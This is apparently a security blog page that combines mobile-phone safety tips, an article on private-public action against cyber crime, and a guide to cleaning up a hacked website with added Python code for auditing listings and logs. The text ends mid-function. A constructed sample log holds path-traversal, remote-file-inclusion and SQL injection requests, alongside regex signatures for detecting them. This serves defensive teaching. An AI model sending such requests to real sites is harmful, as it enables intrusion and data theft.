On this blog you can learn about hacking and how to prevent it, along with many tips and tricks for computers and the internet.
Please do not take photographs with your mobile phone without permission. You are invading privacy.
Do not send obscene/pornographic text or images by SMS.
Do not send obscene/pornographic text or images by MMS (multimedia messaging service).
Do not accept or reply to SMS/MMS from strangers.
Do not transmit obscene/pornographic material, as it is an offence under the Information Technology Act, 2000. The punishment is 5 years' imprisonment and a fine of 1 lakh rupees.
Do not call unknown phone/mobile numbers that you get while chatting or that are displayed on various profiles on the Internet and that you are not familiar with. If you do, you may be causing harassment on behalf of another person.
Do not keep your Bluetooth open to all; you may receive obscene/pornographic text, images and viruses.
Do not give out your mobile number while chatting on the Internet, to avoid “stalking”.
Do not hand over your mobile phone to an unauthorised service center, to avoid cloning.
Do’s
Note down your IMEI number.
Security pin code should be used to avoid misuse of your mobile phones.
Received MMS/SMS should be checked before opening the message.
Delete obscene/pornographic text and images (SMS/MMS) from your mobile phone.
Anti-virus software should be loaded in the mobile phone.
Mobile phone keypad should be locked after every use.
Though law enforcement has come a long way in fighting e-crime, its efforts are still only scratching the surface and businesses are learning they must build cases against culprits themselves, says Ron Condon.
One big attraction for anyone getting into cyber crime is the slim chance of getting caught or punished. Many big companies that fall victim, notably the banks, often choose to sweep the event under the carpet rather than face the shame of admitting they have been hacked.
If they catch the culprit, they are likely to let him go free in exchange for keeping his mouth shut. If crimes are reported to the police, they have little chance of being successfully prosecuted. Law enforcement has much higher priorities, and its resources for chasing computer crime are limited.
John Lyons, formerly of the UK's National Hi-Tech Crime Unit, and now a security consultant, says: "Law enforcement is only able to take on the top three per cent or four per cent of the most serious crimes." And with jurisdiction limited by national borders, their ability to pursue overseas criminals often depends on personal contacts in foreign police forces, rather than any formalised system for sharing information.
But with organised criminal gangs making greater use of the internet to commit offences and launder the proceeds, there is a growing recognition that if we do not take action against them, they will make the internet unusable for legitimate users.
In a paper delivered in March last year to the United Nations Congress on Crime Prevention and Criminal Justice, Scott Charney, Microsoft's head of trustworthy computing, outlined the argument for a joint response from law enforcement and private industry.
The problem for traditional law enforcement in tackling cyber crime is, Charney said, the sheer scale and international nature of the task. "The government cannot be primarily responsible for defending against attacks in the virtual world," he said. "The potential avenues for abuse and the number of potential attackers are simply too many and too hard to identify."
On the other hand, private companies do not have the authority to act alone. He therefore proposed a joint approach with both sides playing an active role and co-operating at a number of levels.
The Botnet Task Force, which held its fourth meeting in Lyon, France, this month, is a good example of the joint approach. Initiated by Microsoft in 2004, it now has the support of Interpol and acts as a means of building awareness and providing training for law enforcement.
The private-public approach to law enforcement is already taking hold at grassroots levels too, as companies realise they must take prime responsibility for gathering evidence.
Dave Jevans, who heads the US-based Anti-Phishing Working Group, says: "The main glimmer of hope is that the banks have realised they need to do something. Most successful prosecutions result from a large company putting in its own resources - for instance, a team of lawyers and IT guys and investigators - who liaise with law enforcement to make it happen. They find the names and addresses, and they track where the money goes, and they present the evidence to make a case. But there is only a handful of companies that can afford to do something like that."
Lyons says any company suspecting it is the victim of cyber crime should contact the police and work with them to agree a way forward. The police can advise on what evidence to gather and then the company can use its own investigators. "In this way, the police take an advisory role and you do the legwork yourself," he says.
Private investigation companies have the advantage of working across national boundaries, which can be useful, for instance, when following money stolen in phishing scams.
Alan Brill, managing director of Kroll Technology Services, says his agents work closely with local law enforcement and follow the same standards of evidence as the police themselves. "The police do a great job with limited resources and budget but they can only handle the really serious criminal activity," he says. "But with the FBI, state and local police involved, it can take weeks or months before they can handle the evidence you've assembled."
He counsels getting trained forensic investigators involved immediately, so they can take an image of infected machines. "You don't get a second chance to take a first look," says Brill, adding that he has had cases of lawyers powering up a machine and losing vital evidence. "You need to get the data imaged, and then you can start making decisions, and give yourself more options."
In another current case being handled by Verisign Security services on behalf of a UK bank, the company had to investigate fraudulent transactions carried out by workers at the bank's offshore call centre. A company spokesperson explains: "We did the forensics, all the process diagrams and put together the case material. We showed what went wrong, we got the money back and changed processes to make sure it didn't happen again." The evidence is now with local police for prosecution.
And yet, despite this activity, we still seem to be scratching the surface of internet crime. Earlier this month, the US Federal Trade Commission joined forces with 30 other countries in the OECD to propose international efforts to combat spam. This advocates greater co-operation between countries in investigations and prosecution.
How they hope to make that work is less clear. The US CAN-Spam Act has been roundly condemned as being ineffective and even encouraging the growth of spam, while EU legislation requires consumers to opt-in before they can receive direct email.
Without more agreement by the legislators, it looks as if the private efforts of organisations such as Spamhaus and the legal muscle of big ISPs are more likely to make a dent in the activities of the cyber criminals than the work of law enforcement.
Security Advisories
Just keeping up to date has not always been enough to keep osCommerce secure. The osCommerce forum has additional security advice for Version 2.x and Version 3.x.
8) Examine your own PHP or ASP.NET code for security holes
The "What is a website hack?" article (top of this page) has more information about the following three most common exploits of custom code, and some others:
Remote File Inclusion (RFI), Local File Inclusion (LFI)
The following PHP functions:
include($variable);
require($variable);
include_once($variable);
require_once($variable);
can be tricked into fetching a malicious script from a remote server and running it as part of the currently executing script if the value of $variable came from an HTTP query string or other user-supplied input and if the value supplied is a URL (web address) rather than the value that the programmer expected.
They can be tricked into divulging the contents of password or other sensitive files if the supplied value of $variable is a local file path on the server.
SQL Injection
When an HTTP query string, or any other data from the outside such as input to a search box, is used in the building of an SQL database command string, maliciously crafted input can corrupt the SQL command, causing it to inject content into database tables or list the contents of the database (such as user names and passwords) on the output page. A widespread attack that used SQL injection was called ASPROX.
If you suspect that a script you wrote yourself might be the security weakness, it is safest to stop using that script until you can examine it carefully. After making a local copy for yourself, delete the script from the server. Removing the links to it isn't enough. As long as the script is on the server, anyone who already knows its name can still access and exploit it. If you leave it on the server, at least rename it.
9) Find and repair all the malicious changes that were made
Now that you have discovered where the security weakness was, and fixed it, it is now safe to repair your website's content, because the attackers won't be able to damage it again.
As described in the "What is a website hack?" article (top of this page), after someone has gained access to your site, they can change anything they want and can do an extraordinary amount of damage. In order of most to least common:
Alter .html, .php, and other text web pages, usually to inject iframes, JavaScript, links, PHP, or other malicious code.
Modify database tables, usually to inject the same types of content listed above, so it will appear on your pages.
Add new files.
Add executable programs to let the attackers "manage" your website files remotely, grant them access even after you clean up (back doors), send spam, connect to IRC servers for botnet communications, mass-attack other websites, etc.
Subvert the operating system, putting the entire server under the control of a remote operator.
However, they rarely do all those things because a server so massively compromised would be quickly noticed, and they don't want that. Usually, they do the first or second item and possibly the third, meaning that you will probably have to clean up malicious changes in your website files or database tables, and look for new files that shouldn't be there.
Two "clean sweep" shortcuts: replace entire website from known-good backups
Steps 9a) to 9d) describe ways to locate and repair files that have been maliciously altered, which can be a time-consuming and painstaking chore, especially if you're not comfortable working with HTML code.
In some cases, it can save time to simply replace everything that might have been damaged with fresh copies that you know are clean. However, doing this destroys the evidence you might need for determining how the attack occurred and how to prevent it happening again. Therefore, before doing this, you should already have a clear idea why the attack succeeded, or should make a copy of the hacked site so you can study it later:
Less drastic - replace contents of public_html: If you are thoroughly familiar with what is in your public_html folder and you are certain this method won't destroy irreplaceable files, you can use cPanel > File Manager or FTP to delete all the files and folders inside /public_html (but don't delete the public_html folder itself) and republish the entire site from a known-good backup.
It will still be a good idea to look for damaged files or malicious new ones in your root directory (/) and its other subdirectories other than public_html.
More drastic - reprovision: To really start fresh at a shared host, you can ask the host to "reprovision" your account, to recreate it as though it is brand new. You lose your historical logs and stats and must build the site up from nothing. I recommend against this unless all other options have failed.
If you have published your site from known-good backups, you can skip a ton of trouble and go to Step 10)!
9a) Get a complete listing of all the files in your website
These sections (9abc) describe three ways to view a list of all the files in your website: shell command (cron), FTP, and cPanel File Manager.
Linux "cron" allows you to run a shell command that emails to you a complete listing of all the files in your site, showing for each the name, timestamp, size, owner, and all the permissions settings. This is by far the best method. It is described fully in a separate article that also explains Linux file and folder permissions.
How to use the directory listing:
It is ideal if you have a similar list that you made previously when the site was clean. You can compare the two to find files that have changed size, files whose timestamps or permissions are not what they should be, and new files that shouldn't be there.
If you don't have a known-good list to compare against, you can still review the new list for files that seem out of place or have wrong ownership or permissions. This will be discussed below.
9b) Examine your site's files in cPanel > File Manager
File Manager allows you to easily review filenames and permissions, but it doesn't show any other information about the files, and navigating up and down the directory tree is a tedious process. File and folder permissions are shown numerically. The article linked above at "Get a complete listing" describes how to translate between numeric "755" and "rwx" notation.
9c) Examine your site's files using FTP
In an FTP view of your website, the folders and files look like what you are used to in Windows Explorer, with a navigational directory tree pane on the left and a folder contents pane on the right. FTP view is easy to navigate, and it allows sorting on the Date Modified column to easily spot recently changed files. If you are unfamiliar with viewing your site by FTP, this article describes how to use Windows Explorer for that, and it has a link to a free Firefox plugin (FireFTP) that does it better.
9d) What to look for in the list of files
Pages with modified dates more recent than you last saved the page yourself. Inspect each modified page to see if code has been added to it. Malicious changes to your displayable website pages often take the form of invisible iframes or "obfuscated" JavaScript. A separate article, what to do when Google flags your website with a "This site may harm your computer" warning, describes how to locate and identify malicious iframes and JavaScript, with examples. It also describes how the domain name referenced in the iframe can help discover the method by which your website was hacked.
If malicious JavaScript or iframes were added to your pages, the intent of the attack was probably to launch browser exploits against your site's visitors.
New files with obviously suspicious names. Some hacks install files with names like hacked.html or vulnerable.php, etc. Others might have nonsensical names or names consisting of random character strings. Some might be in locations that make them suspicious, like a .php file in your /images folder. If you find a file that was definitely installed by the attack, search for other files that have almost the exact same timestamp.
Files you don't recognize. Determine whether each one is malicious or not. You can examine plain text PHP (.php) or Perl (.pl) scripts in a text editor.
Unfortunately, you cannot simply delete all the files that aren't yours. Some are required system files that you just never noticed before. When in doubt, do a web search on the filename or post a question in a forum. Research the names of unfamiliar CGI programs, since they cannot be examined visually.
If an exploit modified files on your server but didn't affect your displayable pages, it suggests that your site visitors weren't the target of the attack. Instead, it might have been trying to turn your site into a spam emailer or into a robot crawler to attack other sites, or to install on your site a library of malicious scripts or other content to be called by injected iframes or RFI attacks on other websites.
Check your root directory ("/") and its subdirectories for malicious or altered files. Even if you delete the contents of your public_html and republish the site from scratch, that doesn't overwrite your folders above public_html, so you must check those manually.
9e) Search your website files for suspicious changes
This PHP script can help search your website for suspicious filenames, for suspicious code, and for other suspicious text.
10) Check that your file and folder permissions are secure
Using the complete file list you made, make sure file and folder permissions are what they should be. Although your complete file list is a text file, the search isn't too difficult. You can search for suspicious "world-writable" 777 folder permissions by searching for the equivalent "rwxrwxrwx" in the text. World-writable 666 file permissions appear in the text as "rw-rw-rw-".
Common correct permissions for world-readable (but not world-writable) folders are 755 (rwxr-xr-x), and common permissions for world-readable files are 644 (rw-r--r--). Those are what you should mostly expect to see.
There are only two situations where world needs write access (777 / 666), and both only apply if your server is configured with PHP as an Apache module:
A file needs 666 permissions if PHP needs to a) open the file and write data into it, or b) copy another file to the directory entry currently occupied by this file.
A folder needs 777 permissions if PHP needs to a) dynamically create new files in it, or b) delete existing files from it. However, if PHP only needs to open and modify the contents of an existing file or even copy another file to the directory slot occupied by an existing file, the folder does not need 777 permissions. It is only necessary that the destination file have 666 permissions. That is counterintuitive because you would think that copying a file involves deleting the existing file and putting the new file where it was, but that is not how Linux views it. It only considers it a change in the file's content, not a change to the directory, so the directory can remain read-only. This is important because there may be some files that PHP only needs to create once, during a program's initial installation when it's setting up its data files. After that, it's possible PHP can do everything it needs with the file set to 666 but the directory locked back down to read-only 755. That is much better because although that one file remains potentially vulnerable to modification, a hacker cannot put new malicious files in a 755 directory.
If you find world-writable permissions on a file or folder, consider it potentially suspicious because those are areas the hacker could have accessed most easily:
Check the contents of 777 folders to ensure they don't contain malicious new files.
Check the contents of 666 files to ensure they don't contain new malicious code.
If you can't think of a good reason why the loose permissions are necessary (does PHP really need to make the changes those permissions allow?), try tightening them to 755 / 644.
Even if you do know why the loose permissions are necessary, try to think of a way to make those permissions unnecessary.
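The listing checks from steps 9a), 9d) and 10), as an added example that is not part of the original article. It assumes the listing is `ls -lR` output (the article does not show its cron command), goes beyond the literal "rwxrwxrwx" / "rw-rw-rw-" search by flagging any entry whose world-write bit is set, and uses constructed sample listings and file names.

```python
import re

# One `ls -l` entry: permissions, link count, owner, group, size, timestamp, name.
ENTRY = re.compile(
    r"^([\-dl][rwxsStT\-]{9})[.+@]?\s+\d+\s+(\S+)\s+(\S+)\s+(\d+)\s+"
    r"(\w{3}\s+\d+\s+[\d:]+)\s+(.+)$"
)

def parse_listing(text):
    """Turn `ls -lR` text into {path: (perms, owner, size, timestamp)}."""
    entries, folder = {}, "."
    for line in text.splitlines():
        line = line.rstrip()
        m = ENTRY.match(line)
        if m:
            perms, owner, _group, size, stamp, name = m.groups()
            if perms[0] == "l":              # symlink: drop the " -> target" part
                name = name.split(" -> ")[0]
            entries[f"{folder}/{name}"] = (perms, owner, int(size), " ".join(stamp.split()))
        elif line.endswith(":"):             # "./public_html/images:" starts a new folder
            folder = line[:-1]
    return entries                           # blank and "total N" lines are ignored

def world_writable(entries):
    """Paths whose 'other' write bit is set: 777 and 666, but also 757, 646, ..."""
    return sorted(p for p, (perms, *_rest) in entries.items()
                  if perms[0] != "l" and perms[8] == "w")

def compare(baseline, current):
    """New paths, and paths whose perms, owner, size or timestamp changed."""
    new = sorted(p for p in current if p not in baseline)
    changed = sorted(p for p in current if p in baseline and current[p] != baseline[p])
    return new, changed

def same_timestamp(entries, known_bad):
    """Other paths stamped at the same minute as a file known to be malicious."""
    stamp = entries[known_bad][3]
    return sorted(p for p, e in entries.items() if e[3] == stamp and p != known_bad)

def misplaced_scripts(entries, data_folders=("images", "uploads")):
    """Script files inside folders that should only hold data (e.g. .php in /images)."""
    return sorted(p for p in entries
                  if p.lower().endswith((".php", ".pl", ".cgi"))
                  and set(p.split("/")[:-1]) & set(data_folders))

# Constructed sample: the listing saved while the site was clean ...
BASELINE = """
./public_html:
total 16
drwxr-xr-x 2 site site 4096 Jan 10 09:15 images
-rw-r--r-- 1 site site 5120 Jan 10 09:15 index.php
drwxr-xr-x 2 site site 4096 Jan 10 09:15 uploads

./public_html/images:
total 4
-rw-r--r-- 1 site site 2048 Jan 10 09:15 logo.png

./public_html/uploads:
total 4
-rw-rw-rw- 1 site site 120 Jan 10 09:15 counter.txt
"""

# ... and the listing taken after the compromise (also constructed).
CURRENT = """
./public_html:
total 16
drwxr-xr-x 2 site site 4096 Mar  2 03:41 images
-rw-r--r-- 1 site site 5390 Mar  2 03:41 index.php
drwxrwxrwx 2 site site 4096 Jan 10 09:15 uploads

./public_html/images:
total 8
-rw-r--r-- 1 site site 2048 Jan 10 09:15 logo.png
-rw-r--r-- 1 nobody nobody 911 Mar  2 03:41 x7f3.php

./public_html/uploads:
total 4
-rw-rw-rw- 1 site site 120 Jan 10 09:15 counter.txt
"""

if __name__ == "__main__":
    before, after = parse_listing(BASELINE), parse_listing(CURRENT)
    new, changed = compare(before, after)
    print("world-writable:", world_writable(after))
    print("new:", new)
    print("changed:", changed)
    print("same minute as new file:", same_timestamp(after, new[0]))
    print("scripts in data folders:", misplaced_scripts(after))
```

The new file's owner differs from the site account in the sample, which is what a file created by the web server process (PHP as an Apache module) looks like in a listing.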
11) Change all your passwords again
In case someone was "watching" inside your site while you did it the first time, do it again now that you know the site is clean.
12) Try to identify the IP address that attacked you
This is not to hunt down the attacker, which is usually pointless (most are robots, and there are millions of them). Rather, the IP address helps find other important information about the attack.
If you can identify their IP address, you will be able to search all your logs for all the places where that IP address appears. That will help identify what weak part of your site was attacked, how it was attacked, and what malicious actions were performed.
Stats programs like Analog, Webalizer, or AWStats won't be much help because they generate aggregated summary statistics. You need the details about individual page requests. cPanel > Web/FTP Stats > Latest Visitors is useful and easy. It's a good place to go when you first discover the problem, but it's only a start. The raw log text files are a better source of information.
a) If you have never used your site's raw access logs before, get a program to unzip .gz files:
Your website's raw access logs are stored and sent to you as gzipped files. One program that will easily extract .gz files is 7-Zip. It is a command line utility that you run from a "Command Prompt" (aka "DOS box").
b) Get your logs from cPanel > Raw Log Manager
The log file location in Plesk has a similar name. If you don't have cPanel, Plesk, or a comparable control panel, you can usually get the logs by FTP, usually from a folder outside public_html, with "logs" or "access logs" in its name. Some shared webhosts don't provide access logs, or they charge an extra fee for them.
Go to cPanel > Raw Log Manager. If you don't see a log file there, try cPanel > Raw Access Logs. That is a holding file where your data is stored until the server does its daily statistics processing, after which the data file is transferred to Raw Log Manager.
Click the name of the file you want to download.
At the Open or Save prompt, click Save. Use a descriptive filename. Save the file to a folder that will be easy to navigate to in a Command Prompt. C:\TEMP works well.
Open a Command Prompt:
Start > All Programs > Accessories > Command Prompt, or
Start > Run > cmd.exe
Go to the folder where you saved the .gz file: cd \TEMP
Type the command line to extract the .gz file: 7za.exe x filename.gz
You should get a report that says "Everything is Ok".
I usually delete the .gz file and rename the output file to .log.
The unzipped log files can be extremely large. In Windows, WordPad can handle up to about 12MB. For easier viewing, set the font to a monospaced font like Courier New, with word wrap Off. Notepad++ can handle files of 100MB or more. In Linux, the gedit editor capacity seems almost unlimited.
If you are comfortable using Microsoft Access, the Webstats.mdb database has tables into which you can import your log files.
The HTTP log will also import into Excel, but you will need to tweak the text import wizard settings to get the fields into their columns properly.
Go through the logs carefully, looking for suspicious activity in the days before the attack occurred, and keep monitoring your logs in case the hackers come back, which they often do.
Your HTTP log shows the visits to your site by HTTP, the request method normally used by ordinary visitors (using their browsers), robots, and hackers.
It's not always easy to determine which lines in an HTTP log are suspicious and which ones aren't. At my hack attempt identifier online calculator, you can paste lines from your HTTP log to find out which ones are hack attempts. It classifies the attempts by type so you can see what ways your site is being attacked, and it explains how the different types of attack work.
If you find suspicious changes made to your site (such as file timestamps that are not from when you changed the files yourself), you can try to correlate those changes with the suspicious entries in your log.
For example, a hacked file's timestamp will often show when the hack occurred (unless the hacker made a special effort not to change the timestamp). If your HTTP log shows a malicious request at the moment of the changed file's timestamp, that is very suspicious.
It could indicate that the file requested by the hack attempt had a security vulnerability that the hacker was able to exploit with their request. The exploitable file does not have to be the same file that was modified. The exploitable file is just the doorway to get at the other files. In this case, you would examine the requested file (not the modified file) for possible security vulnerabilities. This is how your logs can help identify how a hacker got in.
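The log review described above, as an added example that is not part of the original article: it flags requests whose query-string values look like the RFI, LFI or SQL injection inputs described in step 8, keeps the ones that fall near a hacked file's timestamp, and then lists everything the same IP address requested. The Apache "combined" log format, the signature patterns (simple heuristics, not the author's online calculator), the two-minute window and all sample lines and addresses are assumptions or constructed values.

```python
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import parse_qsl

# ip, [timestamp], "METHOD target PROTOCOL", status
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')

# Heuristic signatures, applied to each decoded query-string value.
SIGNATURES = {
    "RFI": re.compile(r"^(https?|ftp)://"),          # a URL where a filename was expected
    "LFI": re.compile(r"\.\./|^/etc/"),              # a local path climbing out of the site
    "SQLi": re.compile(r"\bunion\b.*\bselect\b|'\s*(or|and)\s"),
}

def parse_log(text):
    """Parse access-log text into a list of request records."""
    records = []
    for line in text.splitlines():
        m = LINE.match(line)
        if m:
            ip, stamp, method, target, status = m.groups()
            when = datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")
            records.append({"ip": ip, "when": when, "method": method,
                            "target": target, "status": int(status)})
    return records

def classify(target):
    """Return the set of attack labels whose signature matches a parameter value."""
    labels = set()
    for _name, value in parse_qsl(target.partition("?")[2], keep_blank_values=True):
        for label, pattern in SIGNATURES.items():
            if pattern.search(value.lower()):
                labels.add(label)
    return labels

def investigate(log_text, file_mtime, window=timedelta(minutes=2)):
    """Correlate flagged requests with a modified file's timestamp, then pivot on IP."""
    records = parse_log(log_text)
    hits = [r for r in records
            if classify(r["target"]) and abs(r["when"] - file_mtime) <= window]
    # The script that was *requested* is the one to audit, not the file that changed.
    entry_points = sorted({r["target"].partition("?")[0] for r in hits})
    history = {ip: [r["target"] for r in records if r["ip"] == ip]
               for ip in sorted({r["ip"] for r in hits})}
    return {"entry_points": entry_points, "history": history}

# Constructed sample log; addresses are from documentation ranges.
SAMPLE_LOG = """
198.51.100.7 - - [02/Mar/2010:03:12:09 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.45 - - [02/Mar/2010:03:40:58 +0000] "GET /view.php?page=../../../../etc/passwd HTTP/1.1" 200 412 "-" "libwww-perl/5.8"
203.0.113.45 - - [02/Mar/2010:03:41:02 +0000] "GET /view.php?page=http://files.example.net/a.txt? HTTP/1.1" 200 87 "-" "libwww-perl/5.8"
198.51.100.7 - - [02/Mar/2010:03:41:30 +0000] "GET /images/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.45 - - [02/Mar/2010:03:44:10 +0000] "GET /images/x7f3.php HTTP/1.1" 200 15 "-" "libwww-perl/5.8"
192.0.2.99 - - [02/Mar/2010:07:05:00 +0000] "GET /item.php?id=1+union+select+1,2 HTTP/1.1" 500 0 "-" "-"
"""

# Constructed timestamp of the hacked file, in the same time zone as the log.
MODIFIED_AT = datetime(2010, 3, 2, 3, 41, tzinfo=timezone.utc)

if __name__ == "__main__":
    report = investigate(SAMPLE_LOG, MODIFIED_AT)
    print("audit these scripts:", report["entry_points"])
    for ip, targets in report["history"].items():
        print(ip, "requested:", *targets, sep="\n  ")
```

The IP pivot also surfaces the later request for the newly planted file, which matches no signature on its own.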
As another example, if you use a database, and if SQL injection attacks are the only type of hack attempt your site ever receives, SQL Injection becomes your primary suspect.
Your FTP log shows FTP accesses to your site. FTP stands for File Transfer Protocol. In contrast to HTTP, which is most often used to request files for viewing, FTP is a method of transferring files both to and from your server. It's normally used only by you, the site administrator, but if malicious people or robots manage to log into your FTP as you, they can download your pages, modify them, and upload them back to your website. The only IP addresses in the FTP log should be yours and other authorized FTP users. Make sure the timestamps match times you were logged in and doing transfers.
There is reference information about FTP log file format at Apple Developer Connection.
I've seen reports of numerous instances where a webhost spotted in an FTP log a transfer from an IP address other than that of the site owner and immediately informed the owner that their password had been stolen. In too many of these instances, the surrounding circumstances make the webhost's claim unbelievable. Here is an alternative explanation:
PHP scripts called by RFI attacks sometimes use PHP's FTP file transfer functions to download additional malicious scripts and related files from a remote server so it can run or install them. The initial RFI includes the remote script into a legitimate script on the victim server, at which point it becomes a part of that script. The script then initiates an FTP transfer, which is recorded in the FTP log. The server does not show its own IP address in the FTP log, but rather that of the second party to the transfer, the remote website. The log of the session makes it appear as though someone logged in (which would have required the password) and initiated an FTP transfer, but in fact there never was a login. There didn't have to be one, because the session was initiated on the server, from the inside.
Remember this as a possibility if you find IP addresses other than yours in your FTP log or if your webhost tries to convince you too quickly, without considering other evidence, that your password "must have been" cracked. The danger of believing this easy story line (if it is not true) is that it can lead you to believe that all you have to do is change your password. However, if the real initiator of the FTP transfer was an RFI attack, changing your password won't help at all.
c) Use .htaccess or cPanel > Deny IP to block the hacker's HTTP access to your site
If you identified the hacker's IP address, one site where you can look it up to get more information about it is http://whois.domaintools.com/.
You can ban the IP address from your site using your public_html/.htaccess file. Apache documentation for this is at: http://httpd.apache.org/docs/1.3/mod/mod_access.html.
Review the instructions in a prior article for how to open .htaccess for editing. As described there, insert the following line in a part of the file that is not enclosed in HTML-like tags:
deny from nnn.nnn.nnn.nnn
The nnn's are the IP address to block.
If the hacker returns with a different IP that is in the same IP range (i.e. using the same ISP), you can block the whole range for a while, although that carries the risk of banning legitimate visitors, too. The Apache documentation has instructions for banning a range. Some IP ranges are easily specified using a simple wildcard notation. Other ranges can only be successfully defined using "CIDR/netmask" notation. Although it looks intimidating, it's easy after the first time you do it. See the separate article describing how to calculate and use the CIDR/netmask.
d) If the hacker has obtained access to your cPanel or FTP, banning their IP address in .htaccess will NOT keep them out of cPanel and FTP.
If they have scripts that they call by HTTP, it will prevent them from doing that, but only until they log into cPanel and un-ban themselves in .htaccess.
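For the range banning described in step c), an added example (not from the original article) that computes the CIDR blocks for an address range and writes them as `deny from` lines. The function names, the 256-address limit used to cap collateral blocking, and the sample addresses (documentation ranges) are assumptions.

```python
import ipaddress

def range_to_deny_lines(first, last):
    """CIDR blocks that exactly cover first..last, as 'deny from' lines."""
    nets = ipaddress.summarize_address_range(
        ipaddress.ip_address(first), ipaddress.ip_address(last))
    return [f"deny from {net}" for net in nets]

def covering_block(addresses):
    """Smallest single CIDR block that contains every observed address."""
    ips = sorted(ipaddress.ip_address(a) for a in addresses)
    net = ipaddress.ip_network(f"{ips[0]}/32")
    while ips[-1] not in net:        # widen one bit at a time until the highest fits
        net = net.supernet()
    return net

def deny_lines_for(addresses, max_block=256):
    """Ban one block if it stays small; otherwise ban each address on its own.

    A wide block also bans the ISP's legitimate customers, so blocks larger
    than max_block addresses are not emitted.
    """
    net = covering_block(addresses)
    if net.prefixlen == 32:
        return [f"deny from {net.network_address}"]
    if net.num_addresses <= max_block:
        return [f"deny from {net}"]
    unique = sorted(set(addresses), key=ipaddress.ip_address)
    return [f"deny from {a}" for a in unique]

if __name__ == "__main__":
    # A range that simple wildcard notation cannot express: two CIDR lines are needed.
    print("\n".join(range_to_deny_lines("203.0.113.64", "203.0.113.191")))
    # Two sightings in the same neighbourhood collapse to one small block.
    print("\n".join(deny_lines_for(["203.0.113.45", "203.0.113.77"])))
    # Unrelated addresses would need a huge block, so each is banned separately.
    print("\n".join(deny_lines_for(["203.0.113.45", "198.51.100.7"])))
```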
13) Report or go after the hacker legally?
Hacking is a violation of the terms of service for any legitimate webhost or ISP. If you can prove conclusively that someone is using a particular IP address for hacking (or spamming, too), you could report the incident to the webhost or ISP in hopes that they might shut the perpetrator down. The contact email is often abuse@ the company.
However, your chances of getting anywhere with this aren't very great. Even if you succeed, it's a drop in the bucket. Although you might feel as though you are in a battle of wits with a wily adversary, it is thousands of times more likely that you were hit by an automated drive-by attack that is playing a percentage game, with malicious requests being launched against millions of websites, from hundreds of malicious servers. If one is shut down, it's just a cost of doing business for them.
It is a more worthwhile use of your time to do everything you can to protect your site from all hackers, regardless of who they are, and understand that there will be a constant flood of attacks against your site.
What to do NOW to protect your website
Website security precautions
Sections 1-5 are absolutely necessary. They do not require a lot of technical knowledge.
1) Maintain strong security on the computer that you use to manage your website
Someone who successfully infects your PC can use it to get into your website. That is very common.
On any Windows PC (does not apply to Linux, Mac) that you use to administer your website, install good quality antivirus software to keep it free of viruses and Trojan downloaders that can install spyware such as keyloggers and password-stealers. Get real-time ("on access") protection that detects malware immediately when it is received. "On-demand" scanning (such as once a day or once a week) is not good enough. Malware can do all its damage, steal your data, and even delete itself, before you get around to doing a manual file scan.
On a Windows system, once a month, while logged into your PC as an Administrator, visit Windows Update to install the latest security patches for Microsoft products, including Internet Explorer.
Keep all your internet-related software such as browsers, plug-ins, and add-ons up to date with the latest security patches. Examples are Adobe Reader, Flash, and Java. You can check whether your Firefox plugins are up to date at Mozilla Plugin Check.
Use adequate security settings in your web browser. When Internet Explorer and Firefox are first installed, their default security settings are not high enough, and most people don't change them. Set JavaScript so it is Off by default and only enabled for trusted websites that require it. Follow best practices for IE, and use the NoScript add-on in Firefox.
On a wireless network or in a public "hot spot", your data is transmitted by radio, and it is easy for someone nearby to monitor everything you send and receive that is not encrypted. Normal web browsing on http:// websites is not encrypted, and neither is a normal FTP login. Whenever you are "working wireless", use encrypted https:// to log in to your server, and use secure FTP (SFTP) to transfer files.
2) Follow accepted best practices for your website passwords
Use strong passwords: 8 to 20 random upper/lower/numeric/punctuation characters.
Use a different password in every location.
Only give your password to people who must have it.
If you give your password to someone temporarily, change it as soon as their work is finished.
Here is an entire article about why good passwords are so important. It has a strong password generator and password input boxes where you can practice typing strong passwords accurately to get used to them.
3) Choose third party scripts carefully
Don't load your website with every cool script, gadget, feature, function, and code snippet you can find on the web. Any one of them could let a hacker into your site. Before you use something new, read its vulnerability report at Secunia.com, and do a web search on it to see if people talk about it as a security hazard. Some add-ons and templates are actually designed to be malicious. Ways to avoid those are described by the Google Blogger Team in Keeping Your Blog Secure.
4) Keep third party scripts up to date
Once you have installed a script such as WordPress, SMF, Coppermine, phpBB, or any others, find a way to make sure you are notified quickly when security updates are released. Get on a mailing list, subscribe to an RSS feed, subscribe to a forum board, create a Google Alert, whatever you need to do. When a security update is released, install it within 1 day, if possible.
5) Don't weaken your server's file and folder permissions.
Each file and folder on your server has permissions settings that determine who can read or write that file, execute that program, or enter that folder. Your webhost initially created your webspace with secure permission settings on all files and folders.
Do not modify the permissions until you know what you're doing. Don't guess. One mistake can allow any other account on your shared server to put files on your site, or allow anyone in the world to put files there by first getting into a weaker website on your shared server and running a malicious PHP script from there.
People having trouble installing web applications on their site are sometimes told to try setting the Linux permissions to 777 (for folders) or 666 (for files). Those permission levels are sometimes necessary, but they are a hazard and should only be used for folders and files for which it's absolutely necessary and only during times when it's absolutely necessary. For example, sometimes 777 only needs to be used during installation or during configuration changes or software upgrades. At other times, the application might function just fine even if you change the permissions back to more secure settings. In other words, if you need to use insecure permissions, try to minimize the amount of time they are in effect. There is no reason to leave permission levels low all the time if you only need them to be that way occasionally. Also, if software installation instructions tell you to delete the installation script itself after use, remember to do it. If it's left on the server, someone else who knows it's there (or knows it should be there) can run it, just like you can.
A separate article has a short explanation of permissions settings.
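An added example (not from the original article) of checking a site for the 777/666 permissions discussed above: it walks a folder, lists every file or folder that any account can write to, and clears the group and other write bits. The function names and the constructed demo tree are assumptions; run it as the account that owns the files.

```python
import os
import stat
import tempfile


def audit_world_writable(root):
    """Return sorted (relative_path, octal_mode) for entries writable by 'other'."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # a symlink's own mode bits are not enforced
            mode = stat.S_IMODE(st.st_mode)
            if mode & stat.S_IWOTH:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings.append((rel, format(mode, "03o")))
    return sorted(findings)


def tighten(root, findings):
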